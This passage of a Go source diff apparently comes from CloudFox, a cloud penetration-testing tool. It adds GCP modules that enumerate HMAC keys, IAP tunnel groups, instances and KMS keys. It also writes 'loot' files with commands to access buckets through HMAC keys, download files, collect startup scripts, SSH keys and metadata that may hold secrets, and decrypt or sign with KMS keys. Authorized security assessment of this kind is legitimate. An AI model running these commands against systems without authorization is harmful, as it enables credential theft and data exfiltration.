m.LootMap["hmac-active-keys"].Contents += "\n" + + // S3 commands loot + m.LootMap["hmac-s3-commands"].Contents += fmt.Sprintf( + "## HMAC Key: %s\n"+ + "## Service Account: %s\n"+ + "## Project: %s\n\n"+ + "# Step 1: Configure AWS CLI with HMAC credentials\n"+ + "# You need the secret key which must be obtained at creation time\n"+ + "# If you have iam.serviceAccountKeys.create permission, create a new key:\n"+ + "# gcloud storage hmac create %s --project=%s\n\n"+ + "# Step 2: Use with AWS CLI (after configuration)\n"+ + "aws configure set aws_access_key_id %s\n"+ + "aws configure set aws_secret_access_key \n\n"+ + "# Step 3: List buckets via S3-compatible endpoint\n"+ + "aws --endpoint-url https://storage.googleapis.com s3 ls\n\n"+ + "# Step 4: Access specific bucket\n"+ + "aws --endpoint-url https://storage.googleapis.com s3 ls s3://\n\n"+ + "# Step 5: Download files\n"+ + "aws --endpoint-url https://storage.googleapis.com s3 cp s3:/// .\n\n", + key.AccessID, + key.ServiceAccountEmail, + key.ProjectID, + key.ServiceAccountEmail, + key.ProjectID, + key.AccessID, + ) + } +} + +func (m *HMACKeysModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main HMAC keys table + header := []string{ + "Access ID", + "Service Account", + "State", + "Created", + "Age (Days)", + "Risk", + "Project", + } + + var body [][]string + for _, key := range m.HMACKeys { + age := "-" + if !key.TimeCreated.IsZero() { + ageDays := int(time.Since(key.TimeCreated).Hours() / 24) + age = fmt.Sprintf("%d", ageDays) + } + + body = append(body, []string{ + key.AccessID, + key.ServiceAccountEmail, + key.State, + key.TimeCreated.Format("2006-01-02"), + age, + key.RiskLevel, + key.ProjectID, + }) + } + + // Active keys table + activeHeader := []string{ + "Access ID", + "Service Account", + "Created", + "Risk", + "Risk Reasons", + "Project", + } + + var activeBody [][]string + for _, key := range m.HMACKeys { + if key.IsActive { + activeBody = append(activeBody, []string{ + key.AccessID, + key.ServiceAccountEmail, + key.TimeCreated.Format("2006-01-02"), + key.RiskLevel, + strings.Join(key.RiskReasons, "; "), + key.ProjectID, + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "hmackeys", + Header: header, + Body: body, + }, + } + + if len(activeBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "hmackeys-active", + Header: activeHeader, + Body: activeBody, + }) + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d active HMAC key(s) for S3-compatible access", len(activeBody)), globals.GCP_HMACKEYS_MODULE_NAME) + } + + output := HMACKeysOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_HMACKEYS_MODULE_NAME) + } +} diff --git a/gcp/commands/iap.go b/gcp/commands/iap.go new file mode 100644 index 00000000..b05b5d8a --- /dev/null +++ b/gcp/commands/iap.go @@ -0,0 +1,185 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + iapservice "github.com/BishopFox/cloudfox/gcp/services/iapService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPIAPCommand = &cobra.Command{ + Use: globals.GCP_IAP_MODULE_NAME, + Aliases: []string{"identity-aware-proxy"}, + Short: "Enumerate Identity-Aware Proxy configurations", + Long: `Enumerate Identity-Aware Proxy (IAP) configurations. + +Features: +- Lists IAP tunnel destination groups +- Analyzes IAP settings and bindings +- Identifies overly permissive tunnel configurations +- Checks for public access to IAP resources`, + Run: runGCPIAPCommand, +} + +type IAPModule struct { + gcpinternal.BaseGCPModule + TunnelDestGroups []iapservice.TunnelDestGroup + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type IAPOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o IAPOutput) TableFiles() []internal.TableFile { return o.Table } +func (o IAPOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPIAPCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_IAP_MODULE_NAME) + if err != nil { + return + } + + module := &IAPModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + TunnelDestGroups: []iapservice.TunnelDestGroup{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *IAPModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_IAP_MODULE_NAME, m.processProject) + + if len(m.TunnelDestGroups) == 0 { + logger.InfoM("No IAP tunnel destination groups found", globals.GCP_IAP_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d IAP tunnel destination group(s)", + len(m.TunnelDestGroups)), globals.GCP_IAP_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *IAPModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating IAP in project: %s", projectID), globals.GCP_IAP_MODULE_NAME) + } + + svc := iapservice.New() + + // Get tunnel destination groups + groups, err := svc.ListTunnelDestGroups(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list IAP tunnel groups: %v", err), globals.GCP_IAP_MODULE_NAME) + } + } else { + m.mu.Lock() + m.TunnelDestGroups = append(m.TunnelDestGroups, groups...) + for _, group := range groups { + m.addToLoot(group) + } + m.mu.Unlock() + } +} + +func (m *IAPModule) initializeLootFiles() { + m.LootMap["iap-tunnel-groups"] = &internal.LootFile{ + Name: "iap-tunnel-groups", + Contents: "# IAP Tunnel Destination Groups\n# Generated by CloudFox\n\n", + } + m.LootMap["iap-tunnel-cidrs"] = &internal.LootFile{ + Name: "iap-tunnel-cidrs", + Contents: "", + } +} + +func (m *IAPModule) addToLoot(group iapservice.TunnelDestGroup) { + m.LootMap["iap-tunnel-groups"].Contents += fmt.Sprintf( + "# Group: %s\n# Region: %s\n# CIDRs: %s\n# FQDNs: %s\n\n", + group.Name, group.Region, + strings.Join(group.CIDRs, ", "), + strings.Join(group.FQDNs, ", ")) + + for _, cidr := range group.CIDRs { + m.LootMap["iap-tunnel-cidrs"].Contents += fmt.Sprintf("%s # %s\n", cidr, group.Name) + } +} + +func (m *IAPModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Tunnel Destination Groups table + header := []string{"Name", "Region", "CIDRs", "FQDNs", "Risk", "Project"} + var body [][]string + for _, group := range m.TunnelDestGroups { + cidrs := strings.Join(group.CIDRs, ", ") + if len(cidrs) > 40 { + cidrs = cidrs[:37] + "..." + } + fqdns := strings.Join(group.FQDNs, ", ") + if len(fqdns) > 40 { + fqdns = fqdns[:37] + "..." + } + + body = append(body, []string{ + group.Name, + group.Region, + cidrs, + fqdns, + group.RiskLevel, + group.ProjectID, + }) + } + tables = append(tables, internal.TableFile{ + Name: "iap-tunnel-groups", + Header: header, + Body: body, + }) + + // High-risk findings + var highRiskBody [][]string + for _, group := range m.TunnelDestGroups { + if group.RiskLevel == "HIGH" || group.RiskLevel == "MEDIUM" { + highRiskBody = append(highRiskBody, []string{ + group.Name, + group.RiskLevel, + strings.Join(group.RiskReasons, "; "), + group.ProjectID, + }) + } + } + + if len(highRiskBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "iap-risks", + Header: []string{"Group", "Risk Level", "Reasons", "Project"}, + Body: highRiskBody, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := IAPOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_IAP_MODULE_NAME) + } +} diff --git a/gcp/commands/instances.go b/gcp/commands/instances.go index dd546b96..763de5a4 100644 --- a/gcp/commands/instances.go +++ b/gcp/commands/instances.go @@ -49,9 +49,10 @@ type InstancesModule struct { gcpinternal.BaseGCPModule // Module-specific fields - Instances []ComputeEngineService.ComputeEngineInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + Instances []ComputeEngineService.ComputeEngineInfo + ProjectMetadata map[string]*ComputeEngineService.ProjectMetadataInfo // projectID -> metadata + LootMap map[string]*internal.LootFile + mu sync.Mutex } // ------------------------------ @@ -77,9 +78,10 @@ func runGCPInstancesCommand(cmd *cobra.Command, args []string) { // Create module instance module := &InstancesModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Instances: []ComputeEngineService.ComputeEngineInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Instances: []ComputeEngineService.ComputeEngineInfo{}, + ProjectMetadata: make(map[string]*ComputeEngineService.ProjectMetadataInfo), + LootMap: make(map[string]*internal.LootFile), } // Initialize loot files @@ -116,9 +118,9 @@ func (m *InstancesModule) processProject(ctx context.Context, projectID string, logger.InfoM(fmt.Sprintf("Enumerating instances in project: %s", projectID), globals.GCP_INSTANCES_MODULE_NAME) } - // Create service and fetch instances + // Create service and fetch instances with project metadata ces := ComputeEngineService.New() - instances, err := ces.Instances(projectID) + instances, projectMeta, err := ces.InstancesWithMetadata(projectID) if err != nil { m.CommandCounter.Error++ if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { @@ -130,11 +132,15 @@ func (m *InstancesModule) processProject(ctx context.Context, projectID string, // Thread-safe append m.mu.Lock() m.Instances = append(m.Instances, instances...) + m.ProjectMetadata[projectID] = projectMeta // Generate loot for each instance for _, instance := range instances { m.addInstanceToLoot(instance) } + + // Add project metadata to loot + m.addProjectMetadataToLoot(projectMeta) m.mu.Unlock() if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { @@ -162,6 +168,93 @@ func (m *InstancesModule) initializeLootFiles() { Name: "instances-metadata", Contents: "# GCP Instance Metadata Access Commands\n# Generated by CloudFox\n\n", } + // New pentest-focused loot files + m.LootMap["instances-startup-scripts"] = &internal.LootFile{ + Name: "instances-startup-scripts", + Contents: "# GCP Instance Startup Scripts\n# Generated by CloudFox\n# May contain credentials, API keys, or sensitive configuration\n\n", + } + m.LootMap["instances-ssh-keys"] = &internal.LootFile{ + Name: "instances-ssh-keys", + Contents: "# GCP Instance SSH Keys\n# Generated by CloudFox\n# Format: user:key-type KEY comment\n\n", + } + m.LootMap["instances-project-metadata"] = &internal.LootFile{ + Name: "instances-project-metadata", + Contents: "# GCP Project-Level Metadata\n# Generated by CloudFox\n# SSH keys here apply to ALL instances (unless blocked)\n\n", + } + m.LootMap["instances-custom-metadata"] = &internal.LootFile{ + Name: "instances-custom-metadata", + Contents: "# GCP Custom Metadata Keys\n# Generated by CloudFox\n# These may contain secrets, API keys, or sensitive config\n\n", + } +} + +func (m *InstancesModule) addProjectMetadataToLoot(meta *ComputeEngineService.ProjectMetadataInfo) { + if meta == nil { + return + } + + // Project-level SSH keys + if meta.HasProjectSSHKeys && len(meta.ProjectSSHKeys) > 0 { + m.LootMap["instances-project-metadata"].Contents += fmt.Sprintf( + "## Project: %s\n"+ + "## Project-level SSH Keys (apply to all instances unless blocked):\n"+ + "## OS Login: %v, OS Login 2FA: %v\n", + meta.ProjectID, meta.OSLoginEnabled, meta.OSLogin2FAEnabled, + ) + for _, key := range meta.ProjectSSHKeys { + m.LootMap["instances-project-metadata"].Contents += key + "\n" + } + m.LootMap["instances-project-metadata"].Contents += "\n" + + // Also add to SSH keys loot + m.LootMap["instances-ssh-keys"].Contents += fmt.Sprintf( + "## PROJECT-LEVEL SSH KEYS (Project: %s)\n"+ + "## These apply to ALL instances that don't block project SSH keys\n", + meta.ProjectID, + ) + for _, key := range meta.ProjectSSHKeys { + m.LootMap["instances-ssh-keys"].Contents += key + "\n" + } + m.LootMap["instances-ssh-keys"].Contents += "\n" + } + + // Project-level startup script + if meta.HasProjectStartupScript && meta.ProjectStartupScript != "" { + m.LootMap["instances-startup-scripts"].Contents += fmt.Sprintf( + "## PROJECT-LEVEL STARTUP SCRIPT (Project: %s)\n"+ + "## This runs on ALL instances in the project\n"+ + "## ------- PROJECT STARTUP SCRIPT BEGIN -------\n"+ + "%s\n"+ + "## ------- PROJECT STARTUP SCRIPT END -------\n\n", + meta.ProjectID, meta.ProjectStartupScript, + ) + } + + // Custom metadata keys at project level + if len(meta.CustomMetadataKeys) > 0 { + m.LootMap["instances-custom-metadata"].Contents += fmt.Sprintf( + "## PROJECT-LEVEL CUSTOM METADATA (Project: %s)\n"+ + "## These may contain secrets, API keys, or sensitive config\n"+ + "## Custom keys found:\n", + meta.ProjectID, + ) + for _, key := range meta.CustomMetadataKeys { + m.LootMap["instances-custom-metadata"].Contents += fmt.Sprintf("## - %s\n", key) + } + m.LootMap["instances-custom-metadata"].Contents += fmt.Sprintf( + "# Retrieve all project metadata with:\n"+ + "gcloud compute project-info describe --project=%s --format='yaml(commonInstanceMetadata)'\n\n", + meta.ProjectID, + ) + } + + // Project-level security settings + m.LootMap["instances-project-metadata"].Contents += fmt.Sprintf( + "## Project: %s Security Settings\n"+ + "## OS Login Enabled: %v\n"+ + "## OS Login 2FA Enabled: %v\n"+ + "## Serial Port Enabled: %v\n\n", + meta.ProjectID, meta.OSLoginEnabled, meta.OSLogin2FAEnabled, meta.SerialPortEnabled, + ) } func (m *InstancesModule) addInstanceToLoot(instance ComputeEngineService.ComputeEngineInfo) { @@ -262,6 +355,60 @@ func (m *InstancesModule) addInstanceToLoot(instance ComputeEngineService.Comput instance.Name, instance.Zone, instance.ProjectID, instance.ProjectID, ) + + // Pentest: Extract startup scripts + if instance.StartupScriptContent != "" { + m.LootMap["instances-startup-scripts"].Contents += fmt.Sprintf( + "## Instance: %s (Project: %s, Zone: %s)\n"+ + "## Service Account: %s\n"+ + "## ------- STARTUP SCRIPT BEGIN -------\n"+ + "%s\n"+ + "## ------- STARTUP SCRIPT END -------\n\n", + instance.Name, instance.ProjectID, instance.Zone, saString, + instance.StartupScriptContent, + ) + } + if instance.StartupScriptURL != "" { + m.LootMap["instances-startup-scripts"].Contents += fmt.Sprintf( + "## Instance: %s (Project: %s, Zone: %s)\n"+ + "## Startup Script URL (fetch separately):\n"+ + "## %s\n"+ + "# Fetch with: gsutil cat %s\n\n", + instance.Name, instance.ProjectID, instance.Zone, + instance.StartupScriptURL, + instance.StartupScriptURL, + ) + } + + // Pentest: Extract SSH keys + if len(instance.SSHKeys) > 0 { + m.LootMap["instances-ssh-keys"].Contents += fmt.Sprintf( + "## Instance: %s (Project: %s, Zone: %s)\n"+ + "## Block Project SSH Keys: %v\n", + instance.Name, instance.ProjectID, instance.Zone, instance.BlockProjectSSHKeys, + ) + for _, key := range instance.SSHKeys { + m.LootMap["instances-ssh-keys"].Contents += key + "\n" + } + m.LootMap["instances-ssh-keys"].Contents += "\n" + } + + // Pentest: Custom metadata keys (may contain secrets) + if len(instance.CustomMetadata) > 0 { + m.LootMap["instances-custom-metadata"].Contents += fmt.Sprintf( + "## Instance: %s (Project: %s, Zone: %s)\n"+ + "## Custom metadata keys found:\n", + instance.Name, instance.ProjectID, instance.Zone, + ) + for _, key := range instance.CustomMetadata { + m.LootMap["instances-custom-metadata"].Contents += fmt.Sprintf("## - %s\n", key) + } + m.LootMap["instances-custom-metadata"].Contents += fmt.Sprintf( + "# Retrieve values with:\n"+ + "gcloud compute instances describe %s --zone=%s --project=%s --format='yaml(metadata.items)'\n\n", + instance.Name, instance.Zone, instance.ProjectID, + ) + } } // ------------------------------ @@ -274,6 +421,50 @@ func instanceBoolToCheck(b bool) string { return "-" } +// SSHKeyParts contains parsed SSH key components +type SSHKeyParts struct { + Username string + KeyType string + KeyTruncated string + Comment string +} + +// parseSSHKeyLine parses a GCP SSH key line (format: user:ssh-rsa KEY comment) +func parseSSHKeyLine(line string) SSHKeyParts { + parts := SSHKeyParts{ + Username: "-", + KeyType: "-", + KeyTruncated: "-", + Comment: "", + } + + // Split on first colon to get username + colonIdx := strings.Index(line, ":") + if colonIdx > 0 { + parts.Username = line[:colonIdx] + line = line[colonIdx+1:] + } + + // Split remaining by spaces: key-type KEY comment + fields := strings.Fields(line) + if len(fields) >= 1 { + parts.KeyType = fields[0] + } + if len(fields) >= 2 { + key := fields[1] + if len(key) > 20 { + parts.KeyTruncated = key[:10] + "..." + key[len(key)-10:] + } else { + parts.KeyTruncated = key + } + } + if len(fields) >= 3 { + parts.Comment = strings.Join(fields[2:], " ") + } + + return parts +} + // ------------------------------ // Output Generation // ------------------------------ @@ -449,6 +640,104 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge } } + // Startup scripts table (pentest-focused) + startupHeader := []string{ + "Instance", + "Project ID", + "Zone", + "Script Type", + "Service Account", + "Content Preview", + } + + var startupBody [][]string + for _, instance := range m.Instances { + if instance.StartupScriptContent != "" { + // Preview first 100 chars + preview := instance.StartupScriptContent + if len(preview) > 100 { + preview = preview[:100] + "..." + } + // Replace newlines for table display + preview = strings.ReplaceAll(preview, "\n", "\\n") + + saEmail := "-" + if len(instance.ServiceAccounts) > 0 { + saEmail = instance.ServiceAccounts[0].Email + } + + startupBody = append(startupBody, []string{ + instance.Name, + instance.ProjectID, + instance.Zone, + "Inline", + saEmail, + preview, + }) + } + if instance.StartupScriptURL != "" { + saEmail := "-" + if len(instance.ServiceAccounts) > 0 { + saEmail = instance.ServiceAccounts[0].Email + } + + startupBody = append(startupBody, []string{ + instance.Name, + instance.ProjectID, + instance.Zone, + "URL", + saEmail, + instance.StartupScriptURL, + }) + } + } + + // SSH keys table (pentest-focused) + sshKeysHeader := []string{ + "Source", + "Project ID", + "Zone", + "Username", + "Key Type", + "Key (truncated)", + } + + var sshKeysBody [][]string + + // Add project-level SSH keys + for projectID, meta := range m.ProjectMetadata { + if meta != nil && len(meta.ProjectSSHKeys) > 0 { + for _, key := range meta.ProjectSSHKeys { + parts := parseSSHKeyLine(key) + sshKeysBody = append(sshKeysBody, []string{ + "PROJECT", + projectID, + "-", + parts.Username, + parts.KeyType, + parts.KeyTruncated, + }) + } + } + } + + // Add instance-level SSH keys + for _, instance := range m.Instances { + if len(instance.SSHKeys) > 0 { + for _, key := range instance.SSHKeys { + parts := parseSSHKeyLine(key) + sshKeysBody = append(sshKeysBody, []string{ + instance.Name, + instance.ProjectID, + instance.Zone, + parts.Username, + parts.KeyType, + parts.KeyTruncated, + }) + } + } + } + // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { @@ -484,6 +773,24 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge }) } + // Add startup scripts table if there are any + if len(startupBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "instances-startup-scripts", + Header: startupHeader, + Body: startupBody, + }) + } + + // Add SSH keys table if there are any + if len(sshKeysBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "instances-ssh-keys", + Header: sshKeysHeader, + Body: sshKeysBody, + }) + } + output := InstancesOutput{ Table: tableFiles, Loot: lootFiles, diff --git a/gcp/commands/kms.go b/gcp/commands/kms.go new file mode 100644 index 00000000..8da7ae6e --- /dev/null +++ b/gcp/commands/kms.go @@ -0,0 +1,445 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + KMSService "github.com/BishopFox/cloudfox/gcp/services/kmsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPKMSCommand = &cobra.Command{ + Use: globals.GCP_KMS_MODULE_NAME, + Aliases: []string{"keys", "crypto"}, + Short: "Enumerate Cloud KMS key rings and crypto keys with security analysis", + Long: `Enumerate Cloud KMS key rings and crypto keys across projects with security-relevant details. + +Features: +- Lists all KMS key rings and crypto keys +- Shows key purpose (encryption, signing, MAC) +- Identifies protection level (software, HSM, external) +- Shows rotation configuration and status +- Detects public key access via IAM +- Generates gcloud commands for key operations + +Security Columns: +- Purpose: ENCRYPT_DECRYPT, ASYMMETRIC_SIGN, ASYMMETRIC_DECRYPT, MAC +- Protection: SOFTWARE, HSM, EXTERNAL, EXTERNAL_VPC +- Rotation: Key rotation period and next rotation time +- PublicDecrypt: Whether allUsers/allAuthenticatedUsers can decrypt + +Attack Surface: +- Public decrypt access allows unauthorized data access +- Keys without rotation may be compromised long-term +- HSM vs software protection affects key extraction risk +- External keys indicate third-party key management`, + Run: runGCPKMSCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type KMSModule struct { + gcpinternal.BaseGCPModule + + KeyRings []KMSService.KeyRingInfo + CryptoKeys []KMSService.CryptoKeyInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type KMSOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o KMSOutput) TableFiles() []internal.TableFile { return o.Table } +func (o KMSOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPKMSCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_KMS_MODULE_NAME) + if err != nil { + return + } + + module := &KMSModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + KeyRings: []KMSService.KeyRingInfo{}, + CryptoKeys: []KMSService.CryptoKeyInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *KMSModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_KMS_MODULE_NAME, m.processProject) + + if len(m.CryptoKeys) == 0 { + logger.InfoM("No KMS keys found", globals.GCP_KMS_MODULE_NAME) + return + } + + // Count security-relevant metrics + hsmCount := 0 + publicDecryptCount := 0 + noRotationCount := 0 + for _, key := range m.CryptoKeys { + if key.ProtectionLevel == "HSM" { + hsmCount++ + } + if key.IsPublicDecrypt { + publicDecryptCount++ + } + if key.RotationPeriod == "" && key.Purpose == "ENCRYPT_DECRYPT" { + noRotationCount++ + } + } + + msg := fmt.Sprintf("Found %d key ring(s), %d key(s)", len(m.KeyRings), len(m.CryptoKeys)) + if hsmCount > 0 { + msg += fmt.Sprintf(" [%d HSM]", hsmCount) + } + if publicDecryptCount > 0 { + msg += fmt.Sprintf(" [%d PUBLIC DECRYPT!]", publicDecryptCount) + } + logger.SuccessM(msg, globals.GCP_KMS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *KMSModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating KMS in project: %s", projectID), globals.GCP_KMS_MODULE_NAME) + } + + ks := KMSService.New() + + // Get key rings + keyRings, err := ks.KeyRings(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating KMS key rings in project %s: %v", projectID, err), globals.GCP_KMS_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.KeyRings = append(m.KeyRings, keyRings...) + m.mu.Unlock() + + // Get crypto keys + keys, err := ks.CryptoKeys(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating KMS keys in project %s: %v", projectID, err), globals.GCP_KMS_MODULE_NAME) + } + } else { + m.mu.Lock() + m.CryptoKeys = append(m.CryptoKeys, keys...) + for _, key := range keys { + m.addKeyToLoot(key) + } + m.mu.Unlock() + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d key ring(s), %d key(s) in project %s", len(keyRings), len(keys), projectID), globals.GCP_KMS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *KMSModule) initializeLootFiles() { + m.LootMap["kms-gcloud-commands"] = &internal.LootFile{ + Name: "kms-gcloud-commands", + Contents: "# KMS gcloud Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["kms-public-access"] = &internal.LootFile{ + Name: "kms-public-access", + Contents: "# PUBLIC KMS Key Access\n# Generated by CloudFox\n# These keys have public encrypt/decrypt access!\n\n", + } + m.LootMap["kms-exploitation"] = &internal.LootFile{ + Name: "kms-exploitation", + Contents: "# KMS Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["kms-no-rotation"] = &internal.LootFile{ + Name: "kms-no-rotation", + Contents: "# KMS Keys Without Rotation\n# Generated by CloudFox\n# These encryption keys have no rotation configured\n\n", + } +} + +func (m *KMSModule) addKeyToLoot(key KMSService.CryptoKeyInfo) { + keyPath := fmt.Sprintf("projects/%s/locations/%s/keyRings/%s/cryptoKeys/%s", + key.ProjectID, key.Location, key.KeyRing, key.Name) + + // gcloud commands + m.LootMap["kms-gcloud-commands"].Contents += fmt.Sprintf( + "# Key: %s (Project: %s, KeyRing: %s)\n"+ + "gcloud kms keys describe %s --keyring=%s --location=%s --project=%s\n"+ + "gcloud kms keys get-iam-policy %s --keyring=%s --location=%s --project=%s\n"+ + "gcloud kms keys versions list --key=%s --keyring=%s --location=%s --project=%s\n\n", + key.Name, key.ProjectID, key.KeyRing, + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + + // Public access + if key.IsPublicEncrypt || key.IsPublicDecrypt { + m.LootMap["kms-public-access"].Contents += fmt.Sprintf( + "# KEY: %s\n"+ + "# Project: %s, Location: %s, KeyRing: %s\n"+ + "# Purpose: %s, Protection: %s\n"+ + "# Public Encrypt: %v\n"+ + "# Public Decrypt: %v\n\n", + key.Name, + key.ProjectID, key.Location, key.KeyRing, + key.Purpose, key.ProtectionLevel, + key.IsPublicEncrypt, + key.IsPublicDecrypt, + ) + } + + // Keys without rotation (only for symmetric encryption keys) + if key.RotationPeriod == "" && key.Purpose == "ENCRYPT_DECRYPT" { + m.LootMap["kms-no-rotation"].Contents += fmt.Sprintf( + "# KEY: %s\n"+ + "# Project: %s, Location: %s, KeyRing: %s\n"+ + "# Purpose: %s, Protection: %s\n"+ + "# Created: %s\n\n", + key.Name, + key.ProjectID, key.Location, key.KeyRing, + key.Purpose, key.ProtectionLevel, + key.CreateTime, + ) + } + + // Exploitation commands + m.LootMap["kms-exploitation"].Contents += fmt.Sprintf( + "# Key: %s (Project: %s)\n"+ + "# Purpose: %s, Protection: %s\n"+ + "# Path: %s\n\n", + key.Name, key.ProjectID, + key.Purpose, key.ProtectionLevel, + keyPath, + ) + + switch key.Purpose { + case "ENCRYPT_DECRYPT": + m.LootMap["kms-exploitation"].Contents += fmt.Sprintf( + "# Encrypt data (if you have cloudkms.cryptoKeyVersions.useToEncrypt):\n"+ + "echo -n 'secret data' | gcloud kms encrypt --key=%s --keyring=%s --location=%s --project=%s --plaintext-file=- --ciphertext-file=encrypted.bin\n\n"+ + "# Decrypt data (if you have cloudkms.cryptoKeyVersions.useToDecrypt):\n"+ + "gcloud kms decrypt --key=%s --keyring=%s --location=%s --project=%s --ciphertext-file=encrypted.bin --plaintext-file=-\n\n", + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + case "ASYMMETRIC_SIGN": + m.LootMap["kms-exploitation"].Contents += fmt.Sprintf( + "# Sign data (if you have cloudkms.cryptoKeyVersions.useToSign):\n"+ + "gcloud kms asymmetric-sign --key=%s --keyring=%s --location=%s --project=%s --version=1 --digest-algorithm=sha256 --input-file=data.txt --signature-file=signature.bin\n\n"+ + "# Get public key:\n"+ + "gcloud kms keys versions get-public-key 1 --key=%s --keyring=%s --location=%s --project=%s\n\n", + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + case "ASYMMETRIC_DECRYPT": + m.LootMap["kms-exploitation"].Contents += fmt.Sprintf( + "# Decrypt data (if you have cloudkms.cryptoKeyVersions.useToDecrypt):\n"+ + "gcloud kms asymmetric-decrypt --key=%s --keyring=%s --location=%s --project=%s --version=1 --ciphertext-file=encrypted.bin --plaintext-file=-\n\n"+ + "# Get public key:\n"+ + "gcloud kms keys versions get-public-key 1 --key=%s --keyring=%s --location=%s --project=%s\n\n", + key.Name, key.KeyRing, key.Location, key.ProjectID, + key.Name, key.KeyRing, key.Location, key.ProjectID, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Crypto keys table + keysHeader := 